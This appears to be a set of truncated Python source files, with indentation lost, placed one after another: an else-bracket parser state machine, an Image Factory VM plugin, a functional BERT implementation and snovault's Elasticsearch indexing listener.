if(mode == "closingLastElse") :
mode = "readLastElse"
if(debugMode) : print("\nELSE printing --> ", "else detected : readLastElse mode activated !\n")
if(mode == "readElse" or mode == "readLastElse"):
if(presentChar != ' '):
if(debugMode) : print("\nELSE printing --> ", "A new char :", presentChar," has been read !")
if(presentChar == '{'):
if(debugMode) : print("\nELSE printing --> ", "Too bad... that's a brackety.")
if(mode == "readElse"):
mode = "readBracket"
if(debugMode) : print("\nELSE printing --> ", "readBracket mode activated !\n")
if(mode == "readLastElse") :
mode = "continuingInsideLastElse"
if(debugMode) : print("\nELSE printing --> ", "At this point, we already found an else, then checked if there was another one after that, then find the last one.")
if(debugMode) : print("\nELSE printing --> ", "And this else has an opening bracket. So we just need to wait until the closing one, and we're done !")
if(debugMode) : print("\nELSE printing --> ", "We just need to find the closing one and to add another closing bracket directly after it. That's all.")
if(debugMode) : print("\nELSE printing --> ", "continuingInsideLastElse mode activated !\n")
bracketCounter = 0
paranthesisCounter = 0
else:
if(mode == "readElse"):
mode = "somethingElseAfterElse"
if(debugMode) : print("\nELSE printing --> ", "somethingElseAfterElse mode activated !\n")
if(mode == "readLastElse"):
mode = "somethingAfterLastElse"
if(debugMode) : print("\nELSE printing --> ", "\nThat's a shame we can't take care of that now. We need to focus on closing the wrapping else.")
if(debugMode) : print("\nELSE printing --> ", "\nI guess we're good for another round once we're done.\n")
recursiveCase = True
if(debugMode) : print("\nELSE printing --> ", "somethingAfterLastElse mode activated !\n")
bracketCounter = 0
paranthesisCounter = 0
elif(mode == "readBracket"):
mode = "nothing"
if(debugMode) : print("\nELSE printing --> ", "back to nothing mode !\n")
| |
#!/usr/bin/python
#
# Copyright 2012 Red Hat, Inc.
# Portions Copyright (C) 2012,2013 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import oz.TDL
import oz.GuestFactory
import oz.ozutil
import guestfs
# TODO: We've had to migrate to lxml here because of Oz changes
# see if we can't move the libvirt stuff as well
# For now we import both
import libxml2
import lxml
import configparser
import tempfile
import base64
import os
import os.path
from zope.interface import implementer
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.CloudDelegate import CloudDelegate
from imgfac.PersistentImageManager import PersistentImageManager
from imgfac.ReservationManager import ReservationManager
# This makes extensive use of parameters with some sensible defaults
# Try to keep an accurate list up here
# Parameter - Default -
# Description
# utility_image - <base_image_id>
# Description: UUID of the image that will be launched to do the modification of the
# the base_image referenced in this target_image build. Note that the
# utility image should itself be a base image and can, if constructed properly,
# be the same as the base image that is being modified. The plugin makes a copy
# of the utility image before launching it, which allows safe modification during
# the target_image creation process.
# input_image_file - /input_image.raw (but only if input_image_device is not specified)
# Description: The name of the file on the working space disk where the base_image is presented
# input_image_device - None
# Description: The name of the device where the base_image is presented to the utility VM.
# (e.g. vdc)
# NOTE: You can specify one or the other of these options but not both. If neither are specified
# you will end up with the default value for input_image_file.
# utility_cpus - None
# Description: Number of CPUs in the utility VM - this can also be set in the global Oz config
# The lmc Live CD creation process benefits greatly from extra CPUs during the squashfs
# creation step. The performance improvement is almost perfectly O(n) w.r.t CPU.
# utility_customizations - None
# Description: A partial TDL document to drive the actions of the utility VM - only repos, packages,
# files and commands will be used - all other content is ignored
# results_location - /results/images/boot.iso
# Description: Location inside of the working space image from which to extract the results.
# Borrowed from Oz by <NAME>
def data_from_type(name, contenttype, content):
'''
A function to get data out of some content, possibly decoding it depending
on the content type. This function understands three types of content:
raw (where no decoding is necessary), base64 (where the data needs to be
base64 decoded), and url (where the data needs to be downloaded). Because
the data might be large, all data is sent to file handle, which is returned
from the function.
'''
out = tempfile.NamedTemporaryFile()
if contenttype == 'raw':
out.write(content)
elif contenttype == 'base64':
base64.decode(StringIO.StringIO(content), out)
elif contenttype == 'url':
url = urlparse.urlparse(content)
if url.scheme == "file":
with open(url.netloc + url.path) as f:
out.write("".join(f.readlines()))
else:
oz.ozutil.http_download_file(content, out.fileno(), False, None)
else:
raise oz.OzException.OzException("Type for %s must be 'raw', 'url' or 'base64'" % (name))
# make sure the data is flushed to disk for uses of the file through
# the name
out.flush()
out.seek(0)
return out
@implementer(CloudDelegate)
class IndirectionCloud(object):
def __init__(self):
super(IndirectionCloud, self).__init__()
self.app_config = ApplicationConfiguration().configuration
self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
self.pim = PersistentImageManager.default_manager()
self.res_mgr = ReservationManager()
def builder_should_create_target_image(self, builder, target, image_id, template, parameters):
# This plugin wants to be the only thing operating on the input image
# We do all our work here and then return False which stops any additional activity
self.working_space_image = None
self.utility_image_tmp = None
try:
self._builder_should_create_target_image(builder, target, image_id, template, parameters)
finally:
self.log.debug("Cleaning up temporary utility image and working space image")
for fname in [ self.working_space_image, self.utility_image_tmp ]:
if fname and os.path.isfile(fname):
os.unlink(fname)
return False
def _builder_should_create_target_image(self, builder, target, image_id, template, parameters):
# User may specify a utility image - if they do not we assume we can use the input image
utility_image_id = parameters.get('utility_image', image_id)
# The utility image is what we actually re-animate with Oz
# We borrow these variable names from code that is very similar to the Oz/TinMan OS plugin
self.active_image = self.pim.image_with_id(utility_image_id)
if not self.active_image:
raise Exception("Could not find utility image with ID (%s)" % (utility_image_id) )
self.tdlobj = oz.TDL.TDL(xmlstring=self.active_image.template)
# Later on, we will either copy in the base_image content as a file, or expose it as a device
# to the utility VM. We cannot do both. Detect invalid input here before doing any long running
# work
input_image_device = parameters.get('input_image_device', None)
input_image_file = parameters.get('input_image_filename', None)
if input_image_device and input_image_file:
raise Exception("You can specify either an input_image_device or an input_image_file but not both")
if (not input_image_device) and (not input_image_file):
input_image_file="/input_image.raw"
# We remove any packages, commands and files from the original TDL - these have already been
# installed/executed. We leave the repos in place, as it is possible that commands executed
# later may depend on them
self.tdlobj.packages = [ ]
self.tdlobj.commands = { }
self.tdlobj.files = { }
# This creates a new Oz object - replaces the auto-generated disk file location with
# a copy of the utility image we will make later, and prepares an initial libvirt_xml string
self._init_oz()
self.utility_image_tmp = self.app_config['imgdir'] + "/tmp-utility-image-" + str(builder.target_image.identifier)
self.guest.diskimage = self.utility_image_tmp
# Below we will create this file as a qcow2 image using the original utility image as
# a backing store - For the follow-on XML generation to work correctly, we need to force
# Oz to use qcow2 as the image type
self.guest.image_type = 'qcow2'
if 'utility_cpus' in parameters:
self.guest.install_cpus = int(parameters['utility_cpus'])
libvirt_xml = self.guest._generate_xml("hd", None)
libvirt_doc = libxml2.parseDoc(libvirt_xml)
# Now we create a second disk image as working/scratch space
# Hardcode at 30G
# TODO: Make configurable
# Make it, format it, copy in the base_image
self.working_space_image = self.app_config['imgdir'] + "/working-space-image-" + str(builder.target_image.identifier)
self.create_ext2_image(self.working_space_image)
# Modify the libvirt_xml used with Oz to contain a reference to a second "working space" disk image
working_space_device = parameters.get('working_space_device', 'vdb')
self.add_disk(libvirt_doc, self.working_space_image, working_space_device)
self.log.debug("Updated domain XML with working space image:\n%s" % (libvirt_xml))
# We expect to find a partial TDL document in this parameter - this is what drives the
# tasks performed by the utility image
if 'utility_customizations' in parameters:
self.oz_refresh_customizations(parameters['utility_customizations'])
else:
self.log.info('No additional repos, packages, files or commands specified for utility tasks')
# Create a qcow2 image using the original utility image file (which may be read-only) as a
# backing store.
self.log.debug("Creating temporary writeable qcow2 working copy of utlity image (%s) as (%s)" % (self.active_image.data, self.utility_image_tmp))
self.guest._internal_generate_diskimage(image_filename=self.utility_image_tmp, backing_filename=self.active_image.data)
if input_image_file:
# Here we finally involve the actual Base Image content - it is made available for the utlity image to modify
self.copy_content_to_image(builder.base_image.data, self.working_space_image, input_image_file)
else:
# Note that we know that one or the other of these are set because of code earlier
self.add_disk(libvirt_doc, builder.base_image.data, input_image_device)
# Run all commands, repo injection, etc specified
try:
self.log.debug("Launching utility image and running any customizations specified")
libvirt_xml = libvirt_doc.serialize(None, 1)
self.guest.customize(libvirt_xml)
self.log.debug("Utility image tasks complete")
finally:
self.log.debug("Cleaning up install artifacts")
self.guest.cleanup_install()
# After shutdown, extract the results
results_location = parameters.get('results_location', "/results/images/boot.iso")
self.copy_content_from_image(results_location, self.working_space_image, builder.target_image.data)
def add_disk(self, libvirt_doc, disk_image_file, device_name):
devices = libvirt_doc.xpathEval("/domain/devices")[0]
new_dev = devices.newChild(None, "disk", None)
new_dev.setProp("type", "file")
new_dev.setProp("device", "disk")
source = new_dev.newChild(None, "source", None)
source.setProp("file", disk_image_file)
target = new_dev.newChild(None, "target", None)
target.setProp("dev", device_name)
target.setProp("bus", self.guest.disk_bus)
def oz_refresh_customizations(self, partial_tdl):
# This takes our already created and well formed TDL object with already blank customizations
# and attempts to add in any additional customizations found in partial_tdl
# partial_tdl need not contain the <os>, <name> or <description> sections
| |
<gh_stars>1-10
########################################################
# HuggingFace Transformer implementaion. #
# Modify for forward passing with non-leaf parameters. #
########################################################
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import numbers
import os
import sys
import torch
from torch import embedding, nn
from torch.nn import CrossEntropyLoss, MSELoss
import torch.nn.functional as F
from transformers.modeling_utils import PreTrainedModel, prune_linear_layer
from transformers.configuration_bert import BertConfig
from transformers.file_utils import add_start_docstrings
from transformers.modeling_bert import (BERT_PRETRAINED_MODEL_ARCHIVE_MAP,
load_tf_weights_in_bert, ACT2FN, BertLayerNorm)
logger = logging.getLogger('Modeling BERT')
class BertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config):
super(BertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=0)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.layer_norm_n_shape = (config.hidden_size, )
self.layer_norm_eps=config.layer_norm_eps
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, params, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None, params_prefix='embeddings'):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
device = input_ids.device if input_ids is not None else inputs_embeds.device
if position_ids is None:
position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand(input_shape)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
if inputs_embeds is None:
inputs_embeds = F.embedding(input_ids,
params[f'{params_prefix}_word_embeddings_weight'],
self.word_embeddings.padding_idx, self.word_embeddings.max_norm,
self.word_embeddings.norm_type, self.word_embeddings.scale_grad_by_freq,
self.word_embeddings.sparse)
position_embeddings = F.embedding(position_ids,
params[f'{params_prefix}_position_embeddings_weight'],
self.position_embeddings.padding_idx, self.position_embeddings.max_norm,
self.position_embeddings.norm_type, self.position_embeddings.scale_grad_by_freq,
self.position_embeddings.sparse)
token_type_embeddings = F.embedding(token_type_ids,
params[f'{params_prefix}_token_type_embeddings_weight'],
self.token_type_embeddings.padding_idx, self.token_type_embeddings.max_norm,
self.token_type_embeddings.norm_type, self.token_type_embeddings.scale_grad_by_freq,
self.token_type_embeddings.sparse)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
# embeddings = self.LayerNorm(embeddings)
embeddings = F.layer_norm(
embeddings, self.layer_norm_n_shape,
params[f'{params_prefix}_LayerNorm_weight'],
params[f'{params_prefix}_LayerNorm_bias'],
self.layer_norm_eps)
embeddings = self.dropout(embeddings)
return embeddings
class BertSelfAttention(nn.Module):
def __init__(self, config):
super(BertSelfAttention, self).__init__()
if config.hidden_size % config.num_attention_heads != 0:
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (config.hidden_size, config.num_attention_heads))
self.output_attentions = config.output_attentions
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(self, params, params_prefix, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
mixed_query_layer = F.linear(hidden_states,
params[f'{params_prefix}_query_weight'],
params[f'{params_prefix}_query_bias'])
if encoder_hidden_states is not None:
mixed_key_layer = F.linear(encoder_hidden_states,
params[f'{params_prefix}_key_weight'],
params[f'{params_prefix}_key_bias'])
mixed_value_layer = F.linear(encoder_hidden_states,
params[f'{params_prefix}_value_weight'],
params[f'{params_prefix}_value_bias'])
attention_mask = encoder_attention_mask
else:
mixed_key_layer = F.linear(hidden_states,
params[f'{params_prefix}_key_weight'],
params[f'{params_prefix}_key_bias'])
mixed_value_layer = F.linear(hidden_states,
params[f'{params_prefix}_value_weight'],
params[f'{params_prefix}_value_bias'])
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if self.output_attentions else (context_layer,)
return outputs
class BertSelfOutput(nn.Module):
def __init__(self, config):
super(BertSelfOutput, self).__init__()
self.layer_norm_n_shape = (config.hidden_size, )
self.layer_norm_eps=config.layer_norm_eps
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, params, params_prefix, hidden_states, input_tensor):
hidden_states = F.linear(hidden_states,
params[f'{params_prefix}_dense_weight'],
params[f'{params_prefix}_dense_bias'])
hidden_states = self.dropout(hidden_states)
hidden_states = F.layer_norm(hidden_states + input_tensor,
self.layer_norm_n_shape,
params[f'{params_prefix}_LayerNorm_weight'],
params[f'{params_prefix}_LayerNorm_bias'],
self.layer_norm_eps)
return hidden_states
class BertAttention(nn.Module):
def __init__(self, config):
super(BertAttention, self).__init__()
self.self = BertSelfAttention(config)
self.output = BertSelfOutput(config)
self.pruned_heads = set()
def forward(self,params, params_prefix, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
self_outputs = self.self(params, f'{params_prefix}_self', hidden_states, attention_mask, head_mask, encoder_hidden_states, encoder_attention_mask)
attention_output = self.output(params, f'{params_prefix}_output', self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
class BertIntermediate(nn.Module):
def __init__(self, config):
super(BertIntermediate, self).__init__()
if isinstance(config.hidden_act, str) or (sys.version_info[0] == 2 and isinstance(config.hidden_act, unicode)):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, params, params_prefix, hidden_states):
hidden_states = F.linear(hidden_states,
params[f'{params_prefix}_dense_weight'],
params[f'{params_prefix}_dense_bias'])
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
class BertOutput(nn.Module):
def __init__(self, config):
super(BertOutput, self).__init__()
self.layer_norm_n_shape = (config.hidden_size, )
self.layer_norm_eps=config.layer_norm_eps
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, params, params_prefix, hidden_states, input_tensor):
hidden_states = F.linear(hidden_states,
params[f'{params_prefix}_dense_weight'],
params[f'{params_prefix}_dense_bias'])
hidden_states = self.dropout(hidden_states)
hidden_states = F.layer_norm(hidden_states + input_tensor,
self.layer_norm_n_shape,
params[f'{params_prefix}_LayerNorm_weight'],
params[f'{params_prefix}_LayerNorm_bias'],
self.layer_norm_eps)
return hidden_states
class BertLayer(nn.Module):
def __init__(self, config, params_prefix=''):
super(BertLayer, self).__init__()
self.attention = BertAttention(config)
self.is_decoder = config.is_decoder
if self.is_decoder:
self.crossattention = BertAttention(config)
self.intermediate = BertIntermediate(config)
self.output = BertOutput(config)
self.params_prefix = params_prefix
def forward(self, params, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
self_attention_outputs = self.attention(params, f'{self.params_prefix}_attention', hidden_states, attention_mask, head_mask)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
if self.is_decoder and encoder_hidden_states is not None:
cross_attention_outputs = self.crossattention(attention_output, attention_mask, head_mask, encoder_hidden_states, encoder_attention_mask)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:] # add cross attentions if we output attention weights
intermediate_output = self.intermediate(params, f'{self.params_prefix}_intermediate', attention_output)
layer_output = self.output(params, f'{self.params_prefix}_output', intermediate_output, attention_output)
outputs = (layer_output,) + outputs
return outputs
class BertEncoder(nn.Module):
def __init__(self, config):
super(BertEncoder, self).__init__()
self.output_attentions = config.output_attentions
self.output_hidden_states = config.output_hidden_states
self.layer = nn.ModuleList([BertLayer(config, f'encoder_layer_{i}') for i in range(config.num_hidden_layers)])
def forward(self, params, hidden_states, attention_mask=None, head_mask=None, encoder_hidden_states=None, encoder_attention_mask=None):
all_hidden_states = ()
all_attentions = ()
for i, layer_module in enumerate(self.layer):
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_outputs = layer_module(params, hidden_states, attention_mask, head_mask[i], encoder_hidden_states, encoder_attention_mask)
hidden_states = layer_outputs[0]
if self.output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
# Add last layer
if self.output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if self.output_hidden_states:
outputs = outputs + (all_hidden_states,)
if self.output_attentions:
outputs = outputs + (all_attentions,)
return outputs # last-layer hidden state, (all hidden states), (all attentions)
class BertPooler(nn.Module):
def __init__(self, config):
super(BertPooler, self).__init__()
self.activation = nn.Tanh()
def forward(self, params, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = F.linear(first_token_tensor,
params['pooler_dense_weight'],
params['pooler_dense_bias'])
pooled_output = self.activation(pooled_output)
return pooled_output
class BertPreTrainedModel(PreTrainedModel):
""" An abstract class to handle weights initialization and
a simple interface for dowloading and loading pretrained models.
"""
config_class = BertConfig
pretrained_model_archive_map = BERT_PRETRAINED_MODEL_ARCHIVE_MAP
load_tf_weights = load_tf_weights_in_bert
base_model_prefix = "bert"
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, BertLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
class BertModel(BertPreTrainedModel):
r"""
Outputs: `Tuple` comprising various elements depending on the configuration (config) and inputs:
**last_hidden_state**: ``torch.FloatTensor`` of shape ``(batch_size, sequence_length, hidden_size)``
Sequence of hidden-states at the output of the last layer of the model.
**pooler_output**: ``torch.FloatTensor`` of shape ``(batch_size, hidden_size)``
Last layer hidden-state of the first token of the sequence (classification token)
further processed by a Linear layer and a Tanh activation function. The Linear
layer weights are trained from the next sentence prediction (classification)
objective during Bert pretraining. This output is usually *not* a good summary
of the semantic content of the input, you're often better with averaging or pooling
the sequence of hidden-states for the whole input sequence.
**hidden_states**: (`optional`, returned when ``config.output_hidden_states=True``)
list of ``torch.FloatTensor`` (one for the output of each layer + the output of the embeddings)
of shape ``(batch_size, sequence_length, hidden_size)``:
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
**attentions**: (`optional`, returned when ``config.output_attentions=True``)
list of ``torch.FloatTensor`` (one for each layer) of shape ``(batch_size, num_heads, sequence_length, sequence_length)``:
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads.
Examples::
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute")).unsqueeze(0) # Batch | |
<reponame>caseylitton/snovault
import os
from elasticsearch.exceptions import (
ConflictError,
ConnectionError,
NotFoundError,
TransportError,
)
from pyramid.view import view_config
from pyramid.settings import asbool
from sqlalchemy.exc import StatementError
from snovault import (
COLLECTIONS,
DBSESSION,
STORAGE
)
from snovault.storage import (
TransactionRecord,
)
from urllib3.exceptions import ReadTimeoutError
from .interfaces import (
ELASTIC_SEARCH,
INDEXER,
RESOURCES_INDEX,
)
from .indexer_state import (
IndexerState,
all_uuids,
all_types,
SEARCH_MAX
)
from .simple_queue import SimpleUuidServer
import datetime
import logging
import pytz
import time
import copy
import json
import requests
es_logger = logging.getLogger("elasticsearch")
es_logger.setLevel(logging.ERROR)
log = logging.getLogger('snovault.elasticsearch.es_index_listener')
MAX_CLAUSES_FOR_ES = 8192
DEFAULT_QUEUE = 'Simple'
def _update_for_uuid_queues(registry):
"""
Update registry with uuid queue module if it exists
"""
extra_queues = []
try:
import snovault.elasticsearch.uuid_queue as queue_adapter
except ImportError as ecp:
log.info('No uuid_queue package in elasticsearch module: %s', repr(ecp))
else:
registry['UuidQueue'] = queue_adapter.QueueAdapter
extra_queues = queue_adapter.QueueTypes.get_all()
log.info('Extra Indexer Queues Available: %s', ','.join(extra_queues))
registry['available_queues'].extend(extra_queues)
def includeme(config):
"""Add index listener endpoint and setup Indexer"""
config.add_route('index', '/index')
config.scan(__name__)
registry = config.registry
processes = registry.settings.get('indexer.processes')
is_indexer = registry.settings.get('indexer')
if is_indexer:
available_queues = [DEFAULT_QUEUE]
registry['available_queues'] = available_queues
_update_for_uuid_queues(registry)
if not processes:
registry[INDEXER] = Indexer(registry)
def get_related_uuids(request, es, updated, renamed):
'''Returns (set of uuids, False) or (list of all uuids, True) if full reindex triggered'''
updated_count = len(updated)
renamed_count = len(renamed)
if (updated_count + renamed_count) > MAX_CLAUSES_FOR_ES:
return (list(all_uuids(request.registry)), True) # guaranteed unique
elif (updated_count + renamed_count) == 0:
return (set(), False)
es.indices.refresh(RESOURCES_INDEX)
# TODO: batching may allow us to drive a partial reindexing much greater than 99999
#BATCH_COUNT = 100 # NOTE: 100 random uuids returned > 99999 results!
#beg = 0
#end = BATCH_COUNT
#related_set = set()
#updated_list = list(updated) # Must be lists
#renamed_list = list(renamed)
#while updated_count > beg or renamed_count > beg:
# if updated_count > end or beg > 0:
# log.error('Indexer looking for related uuids by BATCH[%d,%d]' % (beg, end))
#
# updated = []
# if updated_count > beg:
# updated = updated_list[beg:end]
# renamed = []
# if renamed_count > beg:
# renamed = renamed_list[beg:end]
#
# search ...
# accumulate...
#
# beg += BATCH_COUNT
# end += BATCH_COUNT
query = {
'query': {
'bool': {
'should': [
{
'terms': {
'embedded_uuids': updated,
'_cache': False,
},
},
{
'terms': {
'linked_uuids': renamed,
'_cache': False,
},
},
],
},
},
'_source': False,
}
res = es.search(index=RESOURCES_INDEX, size=SEARCH_MAX, request_timeout=60, body=query)
if res['hits']['total'] > SEARCH_MAX:
return (list(all_uuids(request.registry)), True) # guaranteed unique
related_set = {hit['_id'] for hit in res['hits']['hits']}
return (related_set, False)
@view_config(route_name='index', request_method='POST', permission="index")
def index(request):
INDEX = request.registry.settings['snovault.elasticsearch.index']
# Setting request.datastore here only works because routed views are not traversed.
request.datastore = 'database'
record = request.json.get('record', False)
dry_run = request.json.get('dry_run', False)
recovery = request.json.get('recovery', False)
es = request.registry[ELASTIC_SEARCH]
indexer = request.registry[INDEXER]
session = request.registry[DBSESSION]()
connection = session.connection()
first_txn = None
snapshot_id = None
restart=False
invalidated = []
xmin = -1
is_testing = asbool(request.registry.settings.get('testing', False))
is_testing_full = request.json.get('is_testing_full', False)
# Currently 2 possible followup indexers (base.ini [set stage_for_followup = vis_indexer, region_indexer])
stage_for_followup = list(request.registry.settings.get("stage_for_followup", '').replace(' ','').split(','))
# May have undone uuids from prior cycle
state = IndexerState(es, INDEX, followups=stage_for_followup)
(xmin, invalidated, restart) = state.priority_cycle(request)
state.log_reindex_init_state()
# OPTIONAL: restart support
if restart: # Currently not bothering with restart!!!
xmin = -1
invalidated = []
# OPTIONAL: restart support
result = state.get_initial_state() # get after checking priority!
if xmin == -1 or len(invalidated) == 0:
xmin = get_current_xmin(request)
last_xmin = None
if 'last_xmin' in request.json:
last_xmin = request.json['last_xmin']
else:
status = es.get(index=INDEX, doc_type='meta', id='indexing', ignore=[400, 404])
if status['found'] and 'xmin' in status['_source']:
last_xmin = status['_source']['xmin']
if last_xmin is None: # still!
if 'last_xmin' in result:
last_xmin = result['last_xmin']
elif 'xmin' in result and result['xmin'] < xmin:
last_xmin = result['state']
result.update(
xmin=xmin,
last_xmin=last_xmin,
)
if len(invalidated) > SEARCH_MAX: # Priority cycle already set up
flush = True
else:
flush = False
if last_xmin is None:
result['types'] = types = request.json.get('types', None)
invalidated = list(all_uuids(request.registry, types))
flush = True
else:
txns = session.query(TransactionRecord).filter(
TransactionRecord.xid >= last_xmin,
)
invalidated = set(invalidated) # not empty if API index request occurred
updated = set()
renamed = set()
max_xid = 0
txn_count = 0
for txn in txns.all():
txn_count += 1
max_xid = max(max_xid, txn.xid)
if first_txn is None:
first_txn = txn.timestamp
else:
first_txn = min(first_txn, txn.timestamp)
renamed.update(txn.data.get('renamed', ()))
updated.update(txn.data.get('updated', ()))
if invalidated: # reindex requested, treat like updated
updated |= invalidated
result['txn_count'] = txn_count
if txn_count == 0 and len(invalidated) == 0:
state.send_notices()
return result
if is_testing and is_testing_full:
full_reindex = False
related_set = set(all_uuids(request.registry))
else:
(related_set, full_reindex) = get_related_uuids(request, es, updated, renamed)
if full_reindex:
invalidated = related_set
flush = True
else:
invalidated = related_set | updated
result.update(
max_xid=max_xid,
renamed=renamed,
updated=updated,
referencing=len(related_set),
invalidated=len(invalidated),
txn_count=txn_count
)
if first_txn is not None:
result['first_txn_timestamp'] = first_txn.isoformat()
if invalidated and not dry_run:
# Exporting a snapshot mints a new xid, so only do so when required.
# Not yet possible to export a snapshot on a standby server:
# http://www.postgresql.org/message-id/CAHGQGwEtJCeHUB6KzaiJ6ndvx6EFsidTGnuLwJ1itwVH0EJTOA@<EMAIL>
if snapshot_id is None and not recovery:
snapshot_id = connection.execute('SELECT pg_export_snapshot();').scalar()
indexing_update_infos = []
if invalidated and not dry_run:
if len(stage_for_followup) > 0:
# Note: undones should be added before, because those uuids will (hopefully) be indexed in this cycle
state.prep_for_followup(xmin, invalidated)
result = state.start_cycle(invalidated, result)
# Do the work...
indexing_update_infos, errors, err_msg = indexer.serve_objects(
request,
invalidated,
xmin,
snapshot_id=snapshot_id,
restart=restart,
)
if err_msg:
log.warning('Could not start indexing: %s', err_msg)
result = state.finish_cycle(result,errors)
if errors:
result['errors'] = errors
if record:
try:
es.index(index=INDEX, doc_type='meta', body=result, id='indexing')
except:
error_messages = copy.deepcopy(result['errors'])
del result['errors']
es.index(index=INDEX, doc_type='meta', body=result, id='indexing')
for item in error_messages:
if 'error_message' in item:
log.error('Indexing error for {}, error message: {}'.format(item['uuid'], item['error_message']))
item['error_message'] = "Error occured during indexing, check the logs"
result['errors'] = error_messages
es.indices.refresh(RESOURCES_INDEX)
if flush:
try:
es.indices.flush_synced(index=RESOURCES_INDEX) # Faster recovery on ES restart
except ConflictError:
pass
if first_txn is not None:
result['txn_lag'] = str(datetime.datetime.now(pytz.utc) - first_txn)
state.send_notices()
if indexing_update_infos:
# Check for logging of intitial indexing info here,
# opposed to in the indexer or just after serve_objects,
# so a crash in logging does not interupt indexing complietion
indexer.check_log_indexing_times(indexing_update_infos)
return result
def get_current_xmin(request):
session = request.registry[DBSESSION]()
connection = session.connection()
recovery = request.json.get('recovery', False)
# http://www.postgresql.org/docs/9.3/static/functions-info.html#FUNCTIONS-TXID-SNAPSHOT
if recovery:
query = connection.execute(
"SET TRANSACTION ISOLATION LEVEL READ COMMITTED, READ ONLY;"
"SELECT txid_snapshot_xmin(txid_current_snapshot());"
)
else:
query = connection.execute(
